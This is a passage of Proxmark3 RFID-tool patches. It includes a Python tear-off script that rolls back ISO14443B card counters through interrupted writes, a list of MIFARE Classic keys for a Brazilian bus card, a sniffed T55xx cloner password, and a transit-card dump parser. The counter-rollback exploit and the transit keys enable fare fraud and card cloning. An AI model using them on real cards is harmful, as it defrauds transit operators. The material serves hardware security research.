"""Return the int value associated to a bloc list of string + + Args: + list_source: list to convert + + Returns: + represented int + """ + return ((int(list_source[3], 16) << 24) + (int(list_source[2], 16) << 16) + + (int(list_source[1], 16) << 8) + int(list_source[0], 16)) + + +def int_to_slist(src): + """Return the list of string from the int value associated to a block + + Args: + src: int to convert + + Returns: + list of string + """ + list_dest = list() + for i in range(4): + list_dest.append(hex((src >> (8 * i)) & 255)[2:].zfill(2).upper()) + return list_dest + + +def ponderated_read(b_num, repeat_read, sleep_over): + """read a few times a block and give a pondered dictionary + + Args: + b_num: block number to read + + Returns: + dictionary (key: int, value: number of occurrences) + """ + weight_r = dict() + + for _ in range(repeat_read): + # sleep_over=0 favorize read at 0 + # (and allow early discovery of weak bits) + result = slist_to_int( + sub_com(f"hf 14b rdbl -b {b_num}", + parse_rdbl, + sleep_over=sleep_over)) + if result in weight_r: + weight_r[result] += 1 + else: + weight_r[result] = 1 + + return weight_r + + +def exploit_weak_bit(b_num, original_value, repeat_read, sleep_over): + """ + + Args: + b_num: block number + stop: last tearing timing + + """ + # Sending RAW writes because `wrbl` spend additionnal time checking success + cmd_wrb = f"hf 14b raw --sr --crc -d 09{hex(b_num)[2:].rjust(2, '0')}" + + set_space(1) + dic = ponderated_read(b_num, repeat_read, sleep_over) + + for value, occur in dic.items(): + + indic = colors.reset + + if value > original_value: + indic = colors.purple + + elif value < original_value: + indic = colors.lightblue + + print( + f"{(occur / repeat_read) * 100} %" + f" : {indic}{''.join(map(str,int_to_slist(value)))}{colors.reset}" + f" : {indic}{str(bin(value))[2:].zfill(32)}{colors.reset}") + + target = max(dic) + + read_back = 0 + + # There is no ACK for write so we use a read to check distance coherence + if target > (original_value): + + print(f"\n{colors.bold}Trying to consolidate.{colors.reset}" + f"\nKeep card at the max distance from the reader.\n") + + while (read_back != (target - 1)): + print(f"{colors.bold}Writing :{colors.reset}" + f" {''.join(map(str,int_to_slist(target - 1)))}") + sub_com(f"{cmd_wrb}{''.join(map(str,int_to_slist(target - 1)))}") + read_back = slist_to_int( + sub_com(f"hf 14b rdbl -b {b_num}", parse_rdbl)) + + while (read_back != (target - 2)): + print(f"{colors.bold}Writing :{colors.reset}" + f" {''.join(map(str,int_to_slist(target - 2)))}") + sub_com(f"{cmd_wrb}{''.join(map(str,int_to_slist(target - 2)))}") + read_back = slist_to_int( + sub_com(f"hf 14b rdbl -b {b_num}", parse_rdbl)) + + set_space(0) + + +def strat_1_values(original_value): + """return payload and trigger value depending on original_value + follow strategy 1 rules + + Args: + original_value: starting value before exploit + + Returns: + (payload_value, trigger_value) if possible + None otherwise + """ + high1bound = 30 + + # Check for leverageable bits positions, + # Start from bit 32, while their is no bit at 1 decrement position + while ((original_value & (0b11 << high1bound)) != (0b11 << high1bound)): + high1bound -= 1 + if high1bound < 1: + # No bits can be used as leverage + return None + + low1bound = high1bound + + # We found a suitable pair of bits at 1, + # While their is bits at 1, decrement position + while ((original_value & (0b11 << low1bound)) == (0b11 << low1bound)): + low1bound -= 1 + if low1bound < 1: + # No bits can be reset + return None + + trigger_value = (0b01 << (low1bound + 1)) ^ (2**(high1bound + 2) - 1) + payload_value = (0b10 << (low1bound + 1)) ^ (2**(high1bound + 2) - 1) + + return (trigger_value, payload_value) + + +def strat_2_values(original_value): + """return payload and trigger value depending on original_value + follow strategy 2 rules + + Args: + original_value: starting value before exploit + + Returns: + (payload_value, trigger_value) if possible + None otherwise + """ + high1bound = 31 + + # Check for leverageable bit position, + # Start from bit 32, while their is no bit at 1 decrement position + while not (original_value & (0b1 << high1bound)): + high1bound -= 1 + if high1bound < 1: + # No bits can be used as leverage + return None + + low1bound = high1bound + + # We found a suitable bit at 1, + # While their is bits at 1, decrement position + while (original_value & (0b1 << low1bound)): + low1bound -= 1 + if low1bound < 1: + # No bits can be reset + return None + + trigger_value = (0b1 << (low1bound + 1)) ^ (2**(high1bound + 1) - 1) + payload_value = trigger_value ^ (2**min(low1bound, 4) - 1) + + return (trigger_value, payload_value) + + +def tear_for_fears(b_num, strategy): + """try to roll back `b_num` counter using `strategy` + + Args: + b_num: block number + """ + + ################################################################ + ######### You may want to play with theses parameters ######### + start_taring_delay = 130 + + repeat_read = 8 + repeat_write = 5 + + sleep_quick = 0 + sleep_long = 0.3 + ################################################################ + + cmd_wrb = f"hf 14b raw --sr --crc -d 09{hex(b_num)[2:].rjust(2, '0')}" + + print(f"UID: { ''.join(map(str,sub_com('hf 14b info ', parse_UID)))}\n") + + tmp = ponderated_read(b_num, repeat_read, sleep_long) + original_value = max(tmp, key=tmp.get) + + if strategy == 1: + leverageable_values = strat_1_values(original_value) + else: + leverageable_values = strat_2_values(original_value) + + if leverageable_values is None: + print( + f"\n{colors.bold}No bits usable for leverage{colors.reset}\n" + f"Current value : {''.join(map(str,int_to_slist(original_value)))}" + f" : { bin(original_value)[2:].zfill(32)}") + return + + else: + (trigger_value, payload_value) = leverageable_values + + print(f"Initial Value : {''.join(map(str,int_to_slist(original_value)))}" + f" : { bin(original_value)[2:].zfill(32)}") + print(f"Trigger Value : {''.join(map(str,int_to_slist(trigger_value)))}" + f" : { bin(trigger_value)[2:].zfill(32)}") + print(f"Payload Value : {''.join(map(str,int_to_slist(payload_value)))}" + f" : { bin(payload_value)[2:].zfill(32)}\n") + + print( + f"{colors.bold}Color coding :{colors.reset}\n" + f"{colors.reset}\tValue we started with{colors.reset}\n" + f"{colors.green}\tTarget value (trigger|payload){colors.reset}\n" + f"{colors.lightblue}\tBelow target value (trigger|payload){colors.reset}\n" + f"{colors.lightred}\tAbove target value (trigger|payload){colors.reset}\n" + f"{colors.purple}\tAbove initial value {colors.reset}") + + if input(f"\n{colors.bold}Good ? Y/n : {colors.reset}") == "n": + return + + trigger_flag = False + payload_flag = False + t4fears_flag = False + + print(f"\n{colors.bold}Write and tear trigger value : {colors.reset}" + f"{''.join(map(str,int_to_slist(trigger_value)))}\n") + + tear_us = start_taring_delay + + while not trigger_flag: + + for _ in range(repeat_write): + + if t4fears_flag: + exploit_weak_bit(b_num, original_value, repeat_read, + sleep_long) + + if trigger_flag: + break + + sub_com( + f"hw tearoff --delay {tear_us} --on ; " + f"{cmd_wrb}{''.join(map(str, int_to_slist(trigger_value)))}") + + preamb = f"Tear timing = {tear_us:02d} us : " + print(preamb, end="") + + trigger_flag = True + + for value, occur in ponderated_read(b_num, repeat_read, + sleep_quick).items(): + + indic = colors.reset + # Here we want 100% chance of having primed one sub-counter + # The logic is inverted for payload + if value > original_value: + indic = colors.purple + t4fears_flag = True + trigger_flag = False + + elif value == trigger_value: + indic = colors.green + + elif value < original_value: + indic = colors.lightblue + + else: + trigger_flag = False + + print( + f"{(occur / repeat_read) * 100:3.0f} %" + f" : {indic}{''.join(map(str,int_to_slist(value)))}" + f"{colors.reset} : {indic}" + f"{str(bin(value))[2:].zfill(32)}{colors.reset}", + end=f"\n{' ' * len(preamb)}") + + print() + + tear_us += 1 + + print(f"\n{colors.bold}Write and tear payload value : {colors.reset}" + f"{''.join(map(str,int_to_slist(payload_value)))}\n") + + tear_us = start_taring_delay + + while True: + + for _ in range(repeat_write): + + if payload_flag: + + exploit_weak_bit(b_num, original_value, repeat_read, + sleep_long) + + tmp = ponderated_read(b_num, repeat_read, sleep_long) + if max(tmp, key=tmp.get) > original_value: + print(f"{colors.bold}Success ! {colors.reset}") + return + else: + payload_flag = False + + sub_com( + f"hw tearoff --delay {tear_us} --on ; " + f"{cmd_wrb}{''.join(map(str, int_to_slist(payload_value)))}") + + preamb = f"Tear timing = {tear_us:02d} us : " + print(preamb, end="") + + for value, occur in ponderated_read(b_num, repeat_read, + sleep_quick).items(): + + indic = colors.reset + + if value > original_value: + indic = colors.purple + payload_flag = True + + elif value == payload_value: + indic = colors.green + payload_flag = True + + elif value < trigger_value: + indic = colors.lightblue + + elif value > trigger_value: + indic = colors.lightred + + print( + f"{(occur / repeat_read) * 100:3.0f} %" + f" : {indic}{''.join(map(str,int_to_slist(value)))}" + f"{colors.reset} : {indic}" + f"{str(bin(value))[2:].zfill(32)}{colors.reset}", + end=f"\n{' ' * len(preamb)}") + + print() + + tear_us += 1 + + +if __name__ == "__main__": + main() From 167151afa61b0b4439f1ed1b68344acf7643d1c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tiago=20Esperan=C3=A7a=20Triques?= Date: Thu, 6 Jun 2024 14:27:58 -0300 Subject: [PATCH 042/112] Updated mfc_default_keys MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Keys from BusFácil card (Brazilian bus company) --- client/dictionaries/mfc_default_keys.dic | 29 ++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 5856c598c..50cefc0f0 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2453,3 +2453,32 @@ FAB943906E9C # R.A.T.T transport card key A/B AA034F342A55 456776908C48 + +# BusFacil - Brazilian public transport card for some cities +7b296f353c6b +3fa7217ec575 +fae9b14365a9 +c567dd4a6004 +c567dd4a6005 +c567dd4a6006 +c567dd4a6007 +c567dd4a6008 +c567dd4a6009 +c567dd4a600a +c567dd4a600d +c567dd4a600e +c567dd4a600f +5ef014ec5d7f +5086052022ac +bd6af9754c18 +5d67d4732a7d +17fe45604a04 +17fe45604a05 +17fe45604a06 +17fe45604a07 +17fe45604a08 +17fe45604a09 +17fe45604a0a +17fe45604a0d +17fe45604a0e +17fe45604a0f From 4d4b2cb15363c80fd81d8466c6c8660175c2a1d6 Mon Sep 17 00:00:00 2001 From: David Beauchamp Date: Fri, 7 Jun 2024 10:19:09 -0400 Subject: [PATCH 043/112] Add new t55xx password sniffed from cheap cloner --- client/dictionaries/t55xx_default_pwds.dic | 2 ++ 1 file changed, 2 insertions(+) diff --git a/client/dictionaries/t55xx_default_pwds.dic b/client/dictionaries/t55xx_default_pwds.dic index 941826cc8..570264306 100644 --- a/client/dictionaries/t55xx_default_pwds.dic +++ b/client/dictionaries/t55xx_default_pwds.dic @@ -5,6 +5,8 @@ 51243648 000D8787 19920427 +# White Chinese cloner, circa 2019, firmware v5.04.16.0727 (eBay) +002BCFCF # ZX-copy3 T55xx / EM4305 # ref. http://www.proxmark.org/forum/viewtopic.php?pid=40662#p40662 # default PROX From 46c85b41e96c52343c04fb261784bf134242d20a Mon Sep 17 00:00:00 2001 From: David Beauchamp Date: Fri, 7 Jun 2024 11:39:47 -0400 Subject: [PATCH 044/112] Added new t55xx password (002BCFCF) sniffed from cheap cloner --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 7ee87196e..56dba3d3c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac ## [unreleased][unreleased] - Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier +- Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) From 0b54d146f47cca5b5e280fd69b9d813283e1ec34 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Sun, 9 Jun 2024 20:02:31 +0200 Subject: [PATCH 045/112] Update intertic.py to try to parse Date & Time from UsageData in Reims Signed-off-by: Benjamin DELPY --- client/pyscripts/intertic.py | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/client/pyscripts/intertic.py b/client/pyscripts/intertic.py index bbd3e8bb9..a47f338de 100644 --- a/client/pyscripts/intertic.py +++ b/client/pyscripts/intertic.py @@ -271,7 +271,7 @@ def main(): if (s is not None): print(' ~ Authority & Provider ~ :', s) print(' ContractTariff :', ContractTariff); - print(' ContractMediumEndDate : {} ({})'.format(ContractMediumEndDate, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate)).strftime('%Y-%m-%d'))); + print(' ContractMediumEndDate : {} ({} - may be adjusted...)'.format(ContractMediumEndDate, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate)).strftime('%Y-%m-%d'))); print(' left... :', Distribution_left); print(' [CER] Distribution : {:08x}'.format(Distribution_Cer.nom(32))) @@ -287,6 +287,21 @@ def main(): print(' left... :', Usage_left); print(' [CER] Usage : {:04x}'.format(Usage_Cer.nom(16))) + if PID == 0x06 and CountryCode == 0x250 and OrganizationalAuthority == 0x078 and ContractProvider == 4: # Only for FRA - Reims here, it seems date adjust is +4 + DateAdjust = 4 + print() + print(' USAGE Parsing test') + + print(' unk0... :', Usage_Data.nom_bits(54)); + EventValidityTimeFirstStamp = Usage_Data.nom(11) + print(' EventValidityTimeFirstStamp : {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' unk1... :', Usage_Data.nom_bits(31)); + EventDateStamp = Usage_Data.nom(10) + print(' EventDateStamp : {} ({} - may be adjusted...)'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp + DateAdjust)).strftime('%Y-%m-%d'))); + EventTimeStamp = Usage_Data.nom(11) + print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk2... :', Usage_Data.nom_bits(23)); + return 0 From 4bd41d3acf9b9a8bee9e2a1033f675eb27378d90 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Mon, 10 Jun 2024 23:26:38 +0200 Subject: [PATCH 046/112] Fix a lots of parsing errors Signed-off-by: Benjamin DELPY --- client/pyscripts/intertic.py | 331 +++++++++++++++++++---------------- 1 file changed, 183 insertions(+), 148 deletions(-) diff --git a/client/pyscripts/intertic.py b/client/pyscripts/intertic.py index a47f338de..bd1582b36 100644 --- a/client/pyscripts/intertic.py +++ b/client/pyscripts/intertic.py @@ -21,10 +21,14 @@ import sys, os from datetime import datetime, timedelta from bitarray import bitarray from bitarray.util import ba2int +from typing import NamedTuple class BitMe: def __init__(self): - self.data = bitarray() + self.data = bitarray(endian = 'big') + self.idx = 0 + + def reset(self): self.idx = 0 def addBits(self, bits): @@ -47,62 +51,130 @@ class BitMe: def isEmpty(self): return (len(self.data) == 0) +''' +A generic Describe_Usage function with variable number of bits between stamps will be more optimal +At this time I want to keep more places/functions to try to parse other fields in 'unk1' and 'left' +''' +def Describe_Usage_1(Usage, ContractMediumEndDate, Certificate): + EventDateStamp = Usage.nom(10) + EventTimeStamp = Usage.nom(11) + unk = Usage.nom_bits(65) + EventValidityTimeFirstStamp = Usage.nom(11) + + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk1... :', unk); + print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + +def Describe_Usage_2(Usage, ContractMediumEndDate, Certificate): + EventDateStamp = Usage.nom(10) + EventTimeStamp = Usage.nom(11) + unk = Usage.nom_bits(49) + EventValidityTimeFirstStamp = Usage.nom(11) + + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk1... :', unk); + print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + +def Describe_Usage_3(Usage, ContractMediumEndDate, Certificate): + EventDateStamp = Usage.nom(10) + EventTimeStamp = Usage.nom(11) + unk = Usage.nom_bits(27) + EventValidityTimeFirstStamp = Usage.nom(11) + + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk1... :', unk); + print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + +def Describe_Usage_4(Usage, ContractMediumEndDate, Certificate): + EventDateStamp = Usage.nom(10) + EventTimeStamp = Usage.nom(11) + unk = Usage.nom_bits(63) + EventValidityTimeFirstStamp = Usage.nom(11) + + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk1... :', unk); + print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + +def Describe_Usage_Generic(Usage, ContractMediumEndDate, Certificate): + print(' !!! GENERIC DUMP - please provide full file dump to benjamin@gentilkiwi.com - especially if NOT empty !!!') + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + print(' !!! Trying Usage_1 (the most common) !!!') + Usage.reset() + Certificate.reset() + Describe_Usage_1(Usage, ContractMediumEndDate, Certificate) + +class InterticHelper(NamedTuple): + OrganizationalAuthority: str + ContractProvider: str + UsageDescribeFunction: callable = None ISO_Countries = { 0x250: 'France', } - FRA_OrganizationalAuthority_Contract_Provider = { 0x000: { - 5: 'Lille (Ilévia / Keolis)', - 7: 'Lens-Béthune (Tadao / Transdev)', + 5: InterticHelper('Lille', 'Ilévia / Keolis', Describe_Usage_1), + 7: InterticHelper('Lens-Béthune', 'Tadao / Transdev', Describe_Usage_1), }, 0x006: { - 1: 'Amiens (Ametis / Keolis)', + 1: InterticHelper('Amiens', 'Ametis / Keolis'), }, 0x008: { - 15: 'Angoulême (STGA)', + 15: InterticHelper('Angoulême', 'STGA', Describe_Usage_1), }, 0x021: { - 1: 'Bordeaux (TBM / Keolis)', + 1: InterticHelper('Bordeaux', 'TBM / Keolis', Describe_Usage_1), }, 0x057: { - 1: 'Lyon (TCL / Keolis)', + 1: InterticHelper('Lyon', 'TCL / Keolis', Describe_Usage_1), }, 0x072: { - 1: 'Tours (filbleu / Keolis)', + 1: InterticHelper('Tours', 'filbleu / Keolis', Describe_Usage_1), }, 0x078: { - 4: 'Reims (Citura / Transdev)', + 4: InterticHelper('Reims', 'Citura / Transdev', Describe_Usage_1), }, 0x091: { - 1: 'Strasbourg (CTS)', + 1: InterticHelper('Strasbourg', 'CTS', Describe_Usage_4), }, 0x502: { - 83: 'Annecy (Sibra)', - 10: 'Clermont-Ferrand (T2C)', + 83: InterticHelper('Annecy', 'Sibra', Describe_Usage_2), + 10: InterticHelper('Clermont-Ferrand', 'T2C'), }, 0x907: { - 1: 'Dijon (Divia / Keolis)', + 1: InterticHelper('Dijon', 'Divia / Keolis'), }, 0x908: { - 1: 'Rennes (STAR / Keolis)', - 8: 'Saint-Malo (MAT / RATP)', + 1: InterticHelper('Rennes', 'STAR / Keolis', Describe_Usage_2), + 8: InterticHelper('Saint-Malo', 'MAT / RATP'), }, 0x911: { - 5: 'Besançon (Ginko / Keolis)', + 5: InterticHelper('Besançon', 'Ginko / Keolis'), }, 0x912: { - 3: 'Le Havre (Lia / Transdev)', - 35: 'Cherbourg-en-Cotentin (Cap Cotentin / Transdev)', + 3: InterticHelper('Le Havre', 'Lia / Transdev', Describe_Usage_1), + 35: InterticHelper('Cherbourg-en-Cotentin', 'Cap Cotentin / Transdev'), }, 0x913: { - 3: 'Nîmes (Tango / Transdev)', + 3: InterticHelper('Nîmes', 'Tango / Transdev', Describe_Usage_3), }, 0x917: { - 4: 'Angers (Irigo / RATP)', - 7: 'Saint-Nazaire (Stran)', + 4: InterticHelper('Angers', 'Irigo / RATP', Describe_Usage_1), + 7: InterticHelper('Saint-Nazaire', 'Stran'), }, } @@ -136,129 +208,88 @@ def main(): if not chunk: break data.addBytes(chunk[::-1]) - + file.close() - SystemArea = BitMe() Distribution_Data = BitMe() - C1 = BitMe() - C2 = BitMe() - Usage_Sta_B = BitMe() - Usage_Sta_E = BitMe() - Usage_Data = BitMe() - Usage_Cer = BitMe() + Block0Left = BitMe() + # Usage_DAT = BitMe() + # Usage_CER = BitMe() + Usage_A_DAT = BitMe() + Usage_A_CER = BitMe() + Usage_B_DAT = BitMe() + Usage_B_CER = BitMe() Distribution_Cer = BitMe() + SWAP = None + RELOADING1 = None + COUNTER1 = None + # RELOADING2 = None + # COUNTER2 = None + Describe_Usage = None - Distribution_Data_End = data.nom_bits(24) - SystemArea.addBits(data.nom_bits(8)) - - PID = SystemArea.nom(5) - bIsFlipFlop = PID & 0x10 - KeyId = SystemArea.nom(3) - - print() - print('PID (product): 0x{:02x} (flipflop?: {})'.format(PID, bIsFlipFlop)); - print('KeyId :', hex(KeyId)); + Block0Left.addBits(data.nom_bits(23)) + KeyId = data.nom(4) + PID = data.nom(5) match PID: - - case 0x02: - Distribution_Data.addBits(data.nom_bits(3 * 32)) - Usage_Data_End = data.nom_bits(30) - Usage_Sta_B.addBits(data.nom_bits(2)) - C1.addBits(data.nom_bits(32)) - C2.addBits(data.nom_bits(32)) - Usage_Data.addBits(data.nom_bits(7 * 32)) - Usage_Data.addBits(Usage_Data_End) - Usage_Data.addBits(data.nom_bits(14)) - Usage_Sta_E.addBits(data.nom_bits(2)) - Usage_Cer.addBits(data.nom_bits(16)) + + case 0x10: + Distribution_Data.addBits(data.nom_bits(2 * 32)) + Distribution_Data.addBits(Block0Left.nom_bits_left()) + Usage_A_DAT.addBits(data.nom_bits(2 * 32)) + RELOADING1 = data.nom(8) + COUNTER1 = data.nom(24) + SWAP = data.nom(32) + Usage_A_DAT.addBits(data.nom_bits(2 * 32)) + Usage_A_DAT.addBits(data.nom_bits(16)) + Usage_A_CER.addBits(data.nom_bits(16)) + Usage_B_DAT.addBits(data.nom_bits(4 * 32)) + Usage_B_DAT.addBits(data.nom_bits(16)) + Usage_B_CER.addBits(data.nom_bits(16)) Distribution_Cer.addBits(data.nom_bits(32)) - case 0x06: + case 0x11 | 0x19: Distribution_Data.addBits(data.nom_bits(4 * 32)) - C1.addBits(data.nom_bits(32)) - C2.addBits(data.nom_bits(32)) - Distribution_Data.addBits(data.nom_bits(3 * 32)) - Distribution_Data.addBits(Distribution_Data_End) - Usage_Data_End = data.nom_bits(30) - Usage_Sta_B.addBits(data.nom_bits(2)) - Usage_Data.addBits(data.nom_bits(3 * 32)) - Usage_Data.addBits(Usage_Data_End) - Usage_Data.addBits(data.nom_bits(14)) - Usage_Sta_E.addBits(data.nom_bits(2)) - Usage_Cer.addBits(data.nom_bits(16)) + Distribution_Data.addBits(Block0Left.nom_bits_left()) + RELOADING1 = data.nom(8) + COUNTER1 = data.nom(24) + SWAP = data.nom(32) + Usage_A_DAT.addBits(data.nom_bits(3 * 32)) + Usage_A_DAT.addBits(data.nom_bits(16)) + Usage_A_CER.addBits(data.nom_bits(16)) + Usage_B_DAT.addBits(data.nom_bits(3 * 32)) + Usage_B_DAT.addBits(data.nom_bits(16)) + Usage_B_CER.addBits(data.nom_bits(16)) Distribution_Cer.addBits(data.nom_bits(32)) - - case 0x07: - Distribution_Data.addBits(data.nom_bits(4 * 32)) - C1.addBits(data.nom_bits(32)) - C2.addBits(data.nom_bits(32)) - Distribution_Data.addBits(data.nom_bits(4 * 32)) - Distribution_Data.addBits(Distribution_Data_End) - Usage_Data_End = data.nom_bits(30) - Usage_Sta_B.addBits(data.nom_bits(2)) - Usage_Data.addBits(data.nom_bits(3 * 32)) - Usage_Data.addBits(Usage_Data_End) - Usage_Data.addBits(data.nom_bits(14)) - Usage_Sta_E.addBits(data.nom_bits(2)) - Usage_Cer.addBits(data.nom_bits(16)) - Distribution_Cer.addBits(data.nom_bits(32)) - - case 0x0a: - Distribution_Data.addBits(data.nom_bits(4 * 32)) - C1.addBits(data.nom_bits(32)) - C2.addBits(data.nom_bits(32)) - Distribution_Data.addBits(data.nom_bits(8 * 32)) - Distribution_Data.addBits(Distribution_Data_End) - Distribution_Cer.addBits(data.nom_bits(32)) - # No USAGE for 0x0a - - case 0x0b: # Not in the draft :( - Distribution_Data.addBits(data.nom_bits(4 * 32)) - C1.addBits(data.nom_bits(32)) - C2.addBits(data.nom_bits(32)) - Distribution_Data.addBits(data.nom_bits(8 * 32)) - Distribution_Data.addBits(Distribution_Data_End) - Distribution_Cer.addBits(data.nom_bits(32)) - + case _: - print('PID not (yet?) supported') + print('PID not (yet?) supported: 0x{:02x}'.format(PID)) return 3 + + print('PID (product): 0x{:02x} (flipflop?: {})'.format(PID, (PID & 0x10) != 0)); + print('KeyId : 0x{:1x}'.format(KeyId)) + print() + ''' DISTRIBUTION ------------ Not very well documented but seems standard for this part ''' - - ContractNetworkId = Distribution_Data.nom_bits(24) - CountryCode = ba2int(ContractNetworkId[0:0+12]) - OrganizationalAuthority = ba2int(ContractNetworkId[12:12+12]) - - ContractApplicationVersionNumber = Distribution_Data.nom(6) - ContractProvider = Distribution_Data.nom(8) - ContractTariff = Distribution_Data.nom(16) - ContractMediumEndDate = Distribution_Data.nom(14) - - Distribution_left = Distribution_Data.nom_bits_left() - - RELOADING1 = C1.nom(8) - COUNTER1 = C1.nom(24) - RELOADING2 = C2.nom(8) - COUNTER2 = C2.nom(24) - - ''' - USAGE - ----- - No documentation about Usage - All is left - ''' - Usage_left = Usage_Data.nom_bits_left() - if not Distribution_Data.isEmpty(): - print() + + ContractNetworkId = Distribution_Data.nom_bits(24) + CountryCode = ba2int(ContractNetworkId[0:0+12]) + OrganizationalAuthority = ba2int(ContractNetworkId[12:12+12]) + + ContractApplicationVersionNumber = Distribution_Data.nom(6) + ContractProvider = Distribution_Data.nom(8) + ContractTariff = Distribution_Data.nom(16) + ContractMediumEndDate = Distribution_Data.nom(14) + + Distribution_left = Distribution_Data.nom_bits_left() + print('DISTRIBUTION') print(' CountryCode : {:03x} - {}'.format(CountryCode, ISO_Countries.get(CountryCode, '?'))); print(' OrganizationalAuthority : {:03x}'.format(OrganizationalAuthority)); @@ -269,38 +300,42 @@ def main(): if (oa is not None): s = oa.get(ContractProvider) if (s is not None): - print(' ~ Authority & Provider ~ :', s) + print(' ~ Authority & Provider ~ : {} ({})'.format(s.OrganizationalAuthority, s.ContractProvider)) + Describe_Usage = s.UsageDescribeFunction print(' ContractTariff :', ContractTariff); - print(' ContractMediumEndDate : {} ({} - may be adjusted...)'.format(ContractMediumEndDate, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate)).strftime('%Y-%m-%d'))); + print(' ContractMediumEndDate : {} ({})'.format(ContractMediumEndDate, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate)).strftime('%Y-%m-%d'))); print(' left... :', Distribution_left); print(' [CER] Distribution : {:08x}'.format(Distribution_Cer.nom(32))) - - print() - print('COUNTER') - print(' [1] Counter: 0x{:06x} - Reloading available 0x{:02x}'.format(COUNTER1, RELOADING1)) - print(' [2] Counter: 0x{:06x} - Reloading available 0x{:02x}'.format(COUNTER2, RELOADING2)) - - if not Usage_Data.isEmpty(): print() - print('USAGE') - print(' left... :', Usage_left); - print(' [CER] Usage : {:04x}'.format(Usage_Cer.nom(16))) + if(Describe_Usage is None): + Describe_Usage = Describe_Usage_Generic + + if COUNTER1 is not None: + print('[1] Counter: 0x{:06x} - Reloading available: 0x{:02x}'.format(COUNTER1, RELOADING1)) + # if COUNTER2 is not None: + # print('[2] Counter: 0x{:06x} - Reloading available: 0x{:02x}'.format(COUNTER2, RELOADING2)) + if SWAP is not None: + print('[S] SWAP : 0x{:08x} - last usage on USAGE_{}'.format(SWAP, 'B' if SWAP & 0b1 else 'A')) - if PID == 0x06 and CountryCode == 0x250 and OrganizationalAuthority == 0x078 and ContractProvider == 4: # Only for FRA - Reims here, it seems date adjust is +4 - DateAdjust = 4 + + ''' + USAGE + ----- + No real documentation about Usage + Nearly all is left... - did not seen implementation with 2 counters or 1 Usage + ''' + + if not Usage_A_DAT.isEmpty(): print() - print(' USAGE Parsing test') + print('USAGE_A') + Describe_Usage(Usage_A_DAT, ContractMediumEndDate, Usage_A_CER) - print(' unk0... :', Usage_Data.nom_bits(54)); - EventValidityTimeFirstStamp = Usage_Data.nom(11) - print(' EventValidityTimeFirstStamp : {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) - print(' unk1... :', Usage_Data.nom_bits(31)); - EventDateStamp = Usage_Data.nom(10) - print(' EventDateStamp : {} ({} - may be adjusted...)'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = 